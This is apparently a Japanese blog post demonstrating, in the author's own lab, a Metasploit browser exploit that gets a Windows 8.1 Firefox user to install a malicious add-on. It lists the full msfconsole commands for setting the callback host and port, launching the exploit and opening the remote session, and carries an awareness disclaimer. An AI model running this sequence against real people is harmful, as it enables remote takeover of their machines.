ウェブサイトからFirefoxアドオンをダウンロードさせることによる攻撃は、Windows8でも実現します。"Firefox xpi bootstrapped addon"エクスプロイトコードを用いて、サイトへアクセスしたWindows8.1へアクセスを試してみました。実際に、DIRコマンドでファイル一覧を覗くことができました。
毎度のことですが、本記事はセキュリティ意識の向上を目的としています。悪用しないでください。
今回は、Windows8.1+FirefoxPortable、Ubuntu12+MetasploitFrameworkで試しました。
Ubuntu側で使用したコマンド:
#sudo msfconsole (root権限で実行。すでにrootならsudoは不要)
msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.100.104 (UbuntuのIPアドレス) msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 81 msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH / msf exploit(firefox_xpi_bootstrapped_addon) > exploit (ここで、WindowsのFirefoxから、UbuntuのIPのポート8080へアクセスし、 msf exploit(firefox_xpi_bootstrapped_addon) > show sessions (張られたセッション番号を確認) msf exploit(firefox_xpi_bootstrapped_addon) > sessions -i 1 (当該セッションへ接続) |